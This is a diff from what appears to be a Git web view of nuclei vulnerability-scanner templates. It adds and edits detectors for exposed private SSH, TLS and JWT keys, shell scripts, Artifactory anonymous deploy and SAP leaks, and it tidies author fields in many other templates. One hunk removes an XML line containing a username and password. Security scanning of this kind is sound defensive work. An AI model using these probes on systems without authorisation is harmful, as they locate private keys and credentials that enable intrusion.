author: pdteam,geeknik
|
||||
severity: low
|
||||
tags: config,exposure,rails
|
||||
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: server-private-keys
|
||||
|
||||
info:
|
||||
name: Detect Private SSH and TLS Keys
|
||||
name: Detect Private SSH, TLS, and JWT Keys
|
||||
author: geeknik
|
||||
severity: high
|
||||
tags: config,exposure
|
||||
|
@ -25,6 +25,10 @@ requests:
|
|||
- "{{BaseURL}}/.ssh/id_dsa"
|
||||
- "{{BaseURL}}/{{Hostname}}.key"
|
||||
- "{{BaseURL}}/{{Hostname}}.pem"
|
||||
- "{{BaseURL}}/config/jwt/private.pem"
|
||||
- "{{BaseURL}}/jwt/private.pem"
|
||||
- "{{BaseURL}}/var/jwt/private.pem"
|
||||
- "{{BaseURL}}/private.pem"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
|
|
@ -1,9 +1,10 @@
|
|||
id: shellscripts
|
||||
|
||||
info:
|
||||
name: Published shellscripts
|
||||
name: Public shellscripts
|
||||
author: panch0r3d
|
||||
severity: info
|
||||
severity: low
|
||||
tags: bash,exposure
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
@ -25,17 +26,24 @@ requests:
|
|||
- "{{BaseURL}}/wp-setup.sh"
|
||||
- "{{BaseURL}}/deploy.sh"
|
||||
- "{{BaseURL}}/aws.sh"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "application/x-sh"
|
||||
- "text/plain"
|
||||
- "text/x-sh"
|
||||
part: header
|
||||
condition: or
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- ".*?bin.*?sh"
|
||||
- ".*?bin.*?bash"
|
||||
part: body
|
||||
condition: or
|
|
@ -1,7 +1,7 @@
|
|||
id: error-logs
|
||||
info:
|
||||
name: common error log files
|
||||
author: geeknik & daffainfo
|
||||
author: geeknik,daffainfo
|
||||
severity: low
|
||||
tags: logs,exposure
|
||||
|
||||
|
|
|
@ -2,7 +2,7 @@ id: laravel-log-file
|
|||
|
||||
info:
|
||||
name: Laravel log file publicly accessible
|
||||
author: sheikhrishad & geeknik
|
||||
author: sheikhrishad,geeknik
|
||||
severity: high
|
||||
description: The log file of this Laravel web app might reveal details on the inner workings of the app, possibly even tokens, credentials or personal information.
|
||||
reference: https://laravel.com/docs/master/logging
|
||||
|
|
|
@ -2,7 +2,7 @@ id: generic-tokens
|
|||
|
||||
info:
|
||||
name: Generic Tokens
|
||||
author: nadino & geeknik
|
||||
author: nadino,geeknik
|
||||
severity: info
|
||||
tags: exposure,token
|
||||
|
||||
|
|
|
@ -2,7 +2,7 @@ id: fcm-server-key
|
|||
|
||||
info:
|
||||
name: FCM Server Key
|
||||
author: Abss (@absshax)
|
||||
author: absshax
|
||||
severity: high
|
||||
tags: exposure,token,google
|
||||
reference: https://abss.me/posts/fcm-takeover
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: adminer-panel-fuzz
|
||||
info:
|
||||
name: Adminer Login Panel Fuzz
|
||||
author: random-robbie & meme-lord
|
||||
author: random_robbie,meme-lord
|
||||
severity: info
|
||||
reference: https://blog.sorcery.ie/posts/adminer/
|
||||
tags: fuzz,adminer
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: generic-lfi-fuzzing
|
||||
info:
|
||||
name: Generic LFI Test
|
||||
author: geeknik & unstabl3
|
||||
author: geeknik,unstabl3
|
||||
severity: high
|
||||
description: A generic test for Local File Inclusion
|
||||
tags: fuzz,lfi
|
||||
|
|
|
@ -1 +0,0 @@
|
|||
<root><user><JavaOrABAP>java</JavaOrABAP><username>projectdiscover</username><password>proj3ctD1$c0v3ry</password><userType></userType></user></root>
|
|
@ -4,6 +4,7 @@ info:
|
|||
name: Apple app site association for harvesting end points
|
||||
author: panch0r3d
|
||||
severity: info
|
||||
tags: misc
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
@ -11,16 +12,25 @@ requests:
|
|||
- "{{BaseURL}}/.well-known/apple-app-site-association"
|
||||
- "{{BaseURL}}/well-known/apple-app-site-association"
|
||||
- "{{BaseURL}}/apple-app-site-association"
|
||||
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
headers:
|
||||
User-Agent: "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0"
|
||||
max-redirects: 1
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- '(a|A)(p|P)(p|P)(l|L)(i|I)(n|N)(k|K)(s|S)'
|
||||
- type: word
|
||||
words:
|
||||
- 'applinks'
|
||||
- 'appID'
|
||||
- 'paths'
|
||||
part: body
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- 'application/json'
|
||||
part: header
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -2,7 +2,7 @@ id: dir-listing
|
|||
|
||||
info:
|
||||
name: Directory listing enabled
|
||||
author: _harleo & pentest_swissky
|
||||
author: _harleo,pentest_swissky
|
||||
severity: info
|
||||
tags: misc
|
||||
|
||||
|
|
|
@ -1,20 +1,16 @@
|
|||
id: email-address-extraction
|
||||
id: email-extractor
|
||||
|
||||
info:
|
||||
name: Extract Email addresses
|
||||
name: Email Extractor
|
||||
author: panch0r3d
|
||||
severity: info
|
||||
tags: misc,email
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "[a-zA-Z0-9-_.]{4,}@[A-Za-z0-9_-]+[.](com|org|net|io|gov|co|co.uk|com.mx|com.br|com.sv|co.cr|com.gt|com.hn|com.ni|com.au|com.cn)"
|
||||
extractors:
|
||||
- type: regex
|
||||
part: body
|
|
@ -2,7 +2,7 @@ id: aem-groovyconsole
|
|||
|
||||
info:
|
||||
name: AEM Groovy console enabled
|
||||
author: twitter.com/Dheerajmadhukar
|
||||
author: Dheerajmadhukar
|
||||
severity: critical
|
||||
description: Groovy console is exposed, RCE is possible.
|
||||
reference: https://hackerone.com/reports/672243
|
||||
|
|
|
@ -1,27 +1,29 @@
|
|||
id: artifactory-anonymous-deploy
|
||||
|
||||
info:
|
||||
name: Artifactory repos with anonymous deploy permissions
|
||||
name: Artifactory anonymous deploy
|
||||
reference: https://www.errno.fr/artifactory/Attacking_Artifactory.html
|
||||
author: panch0r3d
|
||||
severity: high
|
||||
tags: artifactory
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/artifactory/ui/repodata?deploy=true"
|
||||
headers:
|
||||
User-Agent: "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- '(repoList).*?["].*["]'
|
||||
- '(repoTypesList).*?["].*["]'
|
||||
- type: word
|
||||
words:
|
||||
- '"repoKey"'
|
||||
part: body
|
||||
extractors:
|
||||
- type: regex
|
||||
part: body
|
||||
regex:
|
||||
- '(repoTypesList).*?["].*["]'
|
||||
- '(repoList).*?["].*["]'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "application/json"
|
||||
part: header
|
|
@ -2,7 +2,7 @@ id: django-debug
|
|||
|
||||
info:
|
||||
name: Django Debug Method Enabled
|
||||
author: dhiyaneshDK & hackergautam
|
||||
author: dhiyaneshDK,hackergautam
|
||||
severity: medium
|
||||
tags: django,debug
|
||||
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: druid-monitor
|
||||
info:
|
||||
name: Druid Monitor Unauthorized Access
|
||||
author: 0h1in9e @ohlinge
|
||||
author: ohlinge
|
||||
severity: high
|
||||
tags: druid,unauth
|
||||
|
||||
|
|
|
@ -2,7 +2,7 @@ id: exposed-docker-api
|
|||
|
||||
info:
|
||||
name: Exposed Docker API
|
||||
author: furkansenan & dwisiswant0
|
||||
author: furkansenan,dwisiswant0
|
||||
severity: info
|
||||
tags: docker,unauth,devops
|
||||
|
||||
|
|
|
@ -1,27 +0,0 @@
|
|||
id: firebase-urls
|
||||
|
||||
info:
|
||||
name: Find firebaseio urls to check for security permissions
|
||||
author: panch0r3d
|
||||
severity: info
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/"
|
||||
redirects: true
|
||||
max-redirects: 5
|
||||
headers:
|
||||
User-Agent: "Mozilla UACanary12345"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- ".*?(f|F)(i|I)(r|R)(e|E)(b|B)(a|A)(s|S)(e|E)(i|I)(o|O)[.](c|C)(o|O)(m|M).*?"
|
||||
part: body
|
||||
extractors:
|
||||
- type: regex
|
||||
part: body
|
||||
regex:
|
||||
- "([^]|[']|[ ]|[:]|http)*(f|F)(i|I)(r|R)(e|E)(b|B)(a|A)(s|S)(e|E)(i|I)(o|O)[.](c|C)(o|O)(m|M).*?([\r\n]|[}]|[,]|[>]|[-]|[ ]|['])"
|
||||
- "([^]|[']|[ ]|[:]|http)*(d|D)(a|A)(t|T)(a|A)(b|B)(a|A)(s|S)(e|E).*?([\r\n]|[}]|[,]|[>]|[-]|[ ]|['])"
|
|
@ -2,7 +2,7 @@ id: front-page-misconfig
|
|||
|
||||
info:
|
||||
name: FrontPage configuration information discloure
|
||||
author: JTeles & pikpikcu
|
||||
author: JTeles,pikpikcu
|
||||
severity: info
|
||||
reference: https://docs.microsoft.com/en-us/archive/blogs/fabdulwahab/security-protecting-sharepoint-server-applications
|
||||
|
||||
|
|
|
@ -2,7 +2,7 @@ id: java-melody-exposed
|
|||
|
||||
info:
|
||||
name: JavaMelody Monitoring Exposed
|
||||
author: dhiyaneshDK & thomas_from_offensity
|
||||
author: dhiyaneshDK,thomas_from_offensity
|
||||
severity: medium
|
||||
description: JavaMelody is a tool used to monitor Java or Java EE applications in QA and production environments. JavaMelody was detected on this web application. One option in the dashboard is to “View http sessions”. This can be used by an attacker to steal a user’s session.
|
||||
reference: |
|
||||
|
|
|
@ -2,7 +2,7 @@ id: kubernetes-pods-api
|
|||
|
||||
info:
|
||||
name: Kubernetes Pods API
|
||||
author: ilovebinbash & geeknik & 0xtavian
|
||||
author: ilovebinbash,geeknik,0xtavian
|
||||
severity: critical
|
||||
description: When the service port is available, anyone can execute commands inside the container. See https://github.com/officialhocc/Kubernetes-Kubelet-RCE for inspiration.
|
||||
reference: https://blog.binaryedge.io/2018/12/06/kubernetes-being-hijacked-worldwide/
|
||||
|
|
|
@ -0,0 +1,25 @@
|
|||
id: sap-netweaver-info-leak
|
||||
|
||||
info:
|
||||
name: SAP NetWeaver ICM Info page leak
|
||||
author: randomstr1ng
|
||||
description: Detection of SAP NetWeaver ABAP Webserver /public/info page
|
||||
severity: medium
|
||||
tags: sap,exposure
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/sap/public/info"
|
||||
|
||||
matchers:
|
||||
- type: regex
|
||||
part: body
|
||||
regex:
|
||||
- "RFC_SYSTEM_INFO.Response"
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
part: body
|
||||
regex:
|
||||
- "<RFCDEST>.*</RFCDEST>"
|
|
@ -2,7 +2,7 @@ id: server-status-localhost
|
|||
|
||||
info:
|
||||
name: Server Status Disclosure
|
||||
author: pdteam & geeknik
|
||||
author: pdteam,geeknik
|
||||
severity: low
|
||||
tags: apache,debug
|
||||
|
||||
|
|
|
@ -2,7 +2,7 @@ id: shell-history
|
|||
|
||||
info:
|
||||
name: Shell History
|
||||
author: pentest_swissky & geeknik
|
||||
author: pentest_swissky,geeknik
|
||||
severity: low
|
||||
description: Discover history for bash, ksh, sh, and zsh
|
||||
tags: config
|
||||
|
|
|
@ -2,7 +2,7 @@ id: springboot-configprops
|
|||
|
||||
info:
|
||||
name: Detect Springboot Configprops Actuator
|
||||
author: that_juan_ & dwisiswant0 & wdahlenb
|
||||
author: that_juan_,dwisiswant0,wdahlenb
|
||||
severity: low
|
||||
description: Sensitive environment variables may not be masked
|
||||
tags: springboot,disclosure
|
||||
|
|
|
@ -2,7 +2,7 @@ id: springboot-env
|
|||
|
||||
info:
|
||||
name: Detect Springboot Env Actuator
|
||||
author: that_juan_ & dwisiswant0 & wdahlenb
|
||||
author: that_juan_,dwisiswant0,wdahlenb
|
||||
severity: low
|
||||
description: Sensitive environment variables may not be masked
|
||||
tags: springboot,disclosure
|
||||
|
|
|
@ -2,7 +2,7 @@ id: springboot-heapdump
|
|||
|
||||
info:
|
||||
name: Detect Springboot Heapdump Actuator
|
||||
author: that_juan_ & dwisiswant0 & wdahlenb
|
||||
author: that_juan_,dwisiswant0,wdahlenb
|
||||
severity: critical
|
||||
description: Environment variables and HTTP requests can be found in the HPROF
|
||||
tags: springboot,disclosure
|
||||
|
|
|
@ -2,7 +2,7 @@ id: springboot-httptrace
|
|||
|
||||
info:
|
||||
name: Detect Springboot httptrace
|
||||
author: that_juan_ & dwisiswant0 & wdahlenb
|
||||
author: that_juan_,dwisiswant0,wdahlenb
|
||||
severity: low
|
||||
description: View recent HTTP requests and responses
|
||||
tags: springboot,disclosure
|
||||
|
|
|
@ -2,7 +2,7 @@ id: springboot-loggers
|
|||
|
||||
info:
|
||||
name: Detect Springboot Loggers
|
||||
author: that_juan_ & dwisiswant0 & wdahlenb
|
||||
author: that_juan_,dwisiswant0,wdahlenb
|
||||
severity: low
|
||||
tags: springboot,disclosure
|
||||
|
||||
|
|
|
@ -2,7 +2,7 @@ id: springboot-mappings
|
|||
|
||||
info:
|
||||
name: Detect Springboot Mappings Actuator
|
||||
author: that_juan_ & dwisiswant0 & wdahlenb
|
||||
author: that_juan_,dwisiswant0,wdahlenb
|
||||
severity: low
|
||||
description: Additional routes may be displayed
|
||||
tags: springboot,disclosure
|
||||
|
|
|
@ -2,7 +2,7 @@ id: springboot-trace
|
|||
|
||||
info:
|
||||
name: Detect Springboot Trace Actuator
|
||||
author: that_juan_ & dwisiswant0 & wdahlenb
|
||||
author: that_juan_,dwisiswant0,wdahlenb
|
||||
severity: low
|
||||
description: View recent HTTP requests and responses
|
||||
tags: springboot,disclosure
|
||||
|
|
|
@ -2,7 +2,7 @@ id: unauthenticated-nacos-access
|
|||
|
||||
info:
|
||||
name: Unauthenticated Nacos access v1.x
|
||||
author: taielab & @pikpikcu
|
||||
author: taielab,pikpikcu
|
||||
severity: critical
|
||||
issues: https://github.com/alibaba/nacos/issues/4593
|
||||
tags: nacos,unauth
|
||||
|
|
|
@ -0,0 +1,24 @@
|
|||
id: sap-router-info-leak
|
||||
|
||||
info:
|
||||
name: SAPRouter - Routing information leak
|
||||
author: randomstr1ng
|
||||
severity: critical
|
||||
tags: network,sap
|
||||
|
||||
network:
|
||||
- inputs:
|
||||
- data: 00000022524f555445525f41444d002802000000000000000000000000000000000000000000
|
||||
type: hex
|
||||
|
||||
host:
|
||||
- "{{Hostname}}"
|
||||
- "{{Hostname}}:3299"
|
||||
read-size: 2048
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "Routtab"
|
||||
- "Working directory"
|
||||
- "SAProuter Connection Table"
|
|
@ -0,0 +1,22 @@
|
|||
id: sap-router
|
||||
|
||||
info:
|
||||
name: SAPRouter Detection
|
||||
author: randomstr1ng
|
||||
severity: info
|
||||
tags: network,sap
|
||||
|
||||
network:
|
||||
- inputs:
|
||||
- data: 57484f415245594f553f0a
|
||||
type: hex
|
||||
|
||||
host:
|
||||
- "{{Hostname}}"
|
||||
- "{{Hostname}}:3299"
|
||||
read-size: 1024
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "SAProuter"
|
|
@ -2,7 +2,7 @@ id: unauth-ftp
|
|||
|
||||
info:
|
||||
name: FTP Anonymous Login
|
||||
author: Celesian ( @C3l3si4n )
|
||||
author: C3l3si4n
|
||||
severity: medium
|
||||
reference: https://tools.ietf.org/html/rfc2577
|
||||
tags: network,ftp
|
||||
|
|
|
@ -2,7 +2,7 @@ id: acquia-takeover
|
|||
|
||||
info:
|
||||
name: Acquia Takeover Detection
|
||||
author: pdcommunity
|
||||
author: pdteam
|
||||
severity: info
|
||||
tags: takeover
|
||||
reference: https://github.com/EdOverflow/can-i-take-over-xyz
|
||||
|
|
|
@ -2,7 +2,7 @@ id: aftership-takeover
|
|||
|
||||
info:
|
||||
name: Aftership Takeover Detection
|
||||
author: pdcommunity
|
||||
author: pdteam
|
||||
severity: high
|
||||
tags: takeover
|
||||
reference: https://github.com/EdOverflow/can-i-take-over-xyz
|
||||
|
|
|
@ -2,7 +2,7 @@ id: agilecrm-takeover
|
|||
|
||||
info:
|
||||
name: agilecrm takeover detection
|
||||
author: pdcommunity
|
||||
author: pdteam
|
||||
severity: high
|
||||
tags: takeover
|
||||
reference: https://github.com/EdOverflow/can-i-take-over-xyz
|
||||
|
|
|
@ -2,7 +2,7 @@ id: aha-takeover
|
|||
|
||||
info:
|
||||
name: Aha Takeover Detection
|
||||
author: pdcommunity
|
||||
author: pdteam
|
||||
severity: high
|
||||
tags: takeover
|
||||
reference: https://github.com/EdOverflow/can-i-take-over-xyz
|
||||
|
|
|
@ -2,7 +2,7 @@ id: airee-takeover
|
|||
|
||||
info:
|
||||
name: Airee Takeover Detection
|
||||
author: pdcommunity
|
||||
author: pdteam
|
||||
severity: high
|
||||
tags: takeover
|
||||
reference: https://github.com/EdOverflow/can-i-take-over-xyz
|
||||
|
|
|
@ -2,7 +2,7 @@ id: anima-takeover
|
|||
|
||||
info:
|
||||
name: Anima Takeover Detection
|
||||
author: pdcommunity
|
||||
author: pdteam
|
||||
severity: high
|
||||
tags: takeover
|
||||
reference: https://github.com/EdOverflow/can-i-take-over-xyz
|
||||
|
|
|
@ -2,7 +2,7 @@ id: aws-bucket-takeover
|
|||
|
||||
info:
|
||||
name: AWS Bucket Takeover Detection
|
||||
author: pdcommunity
|
||||
author: pdteam
|
||||
severity: high
|
||||
tags: takeover,aws
|
||||
reference: https://github.com/EdOverflow/can-i-take-over-xyz
|
||||
|
|
|
@ -2,7 +2,7 @@ id: bigcartel-takeover
|
|||
|
||||
info:
|
||||
name: Bigcartel Takeover Detection
|
||||
author: pdcommunity
|
||||
author: pdteam
|
||||
severity: high
|
||||
tags: takeover
|
||||
reference: https://github.com/EdOverflow/can-i-take-over-xyz
|
||||
|
|
|
@ -2,7 +2,7 @@ id: bitbucket-takeover
|
|||
|
||||
info:
|
||||
name: Bitbucket Takeover Detection
|
||||
author: pdcommunity
|
||||
author: pdteam
|
||||
severity: high
|
||||
tags: takeover
|
||||
reference: https://github.com/EdOverflow/can-i-take-over-xyz
|
||||
|
|
|
@ -2,7 +2,7 @@ id: brightcove-takeover
|
|||
|
||||
info:
|
||||
name: brightcove takeover detection
|
||||
author: pdcommunity
|
||||
author: pdteam
|
||||
severity: high
|
||||
tags: takeover
|
||||
reference: https://github.com/EdOverflow/can-i-take-over-xyz
|
||||
|
|
Some files were not shown because too many files have changed in this diff Show More
Loading…
Reference in New Issue